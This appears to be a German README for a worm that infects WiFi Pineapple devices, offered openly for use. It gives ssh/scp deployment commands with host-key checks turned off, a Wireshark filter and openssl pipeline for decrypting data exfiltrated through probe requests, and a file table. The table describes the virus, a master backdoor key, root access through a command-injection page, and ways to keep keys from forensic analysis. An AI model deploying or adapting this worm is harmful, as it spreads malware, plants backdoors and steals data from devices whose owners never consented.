
Ein WiFi-Pineapple-Wurm, der Systeme infiziert.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Hinweis: Sie benötigen ein konfiguriertes Gerät ODER verwenden Sie das Metasploit-Modul, um SSH zu aktivieren.
Der Wireshark-Filter lautet:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
Optional können Sie das harvest.py-Skript wie folgt verwenden:
python harvest.py [monitor-iface]
| File | Zweck |
|---|
| tv | Das Virus selbst. |
| tvbd | Der "Master"-Backdoor-Schlüssel, verteilen Sie den privaten Schlüssel nicht. |
| tvd | Der Offenlegungsschlüssel, der zum Exfiltrieren von Daten über Probe Requests verwendet wird. |
| tospo_rsa | Der private Identitätsschlüssel, spezifisch für jedes infizierte Gerät, verwendet als Übertragungsschlüssel. |
| tospo_rsa.pub | Der öffentliche Identitätsschlüssel, der über die Command-Injection-Seite übertragen wird, damit die private Identität Aktionen als Root auf dem entfernten Gerät ausführen kann. |
| w | Übertragene Wireless-Konfigurationsoptionen, verwendet zum Wiederherstellen vorheriger Verbindungen. |
| n | Übertragene Netzwerkkonfigurationsoptionen, verwendet zum Wiederherstellen vorheriger Verbindungen. |
| Hinweis: Alle Dateien, die mit 'tv' beginnen, werden beim Infizieren eines neuen Geräts übertragen. Fügen Sie keine privaten Schlüssel oder Ähnliches mit Namen hinzu, die mit 'tv' beginnen, sonst wird Ihr privater Schlüssel der forensischen Analyse ausgesetzt. |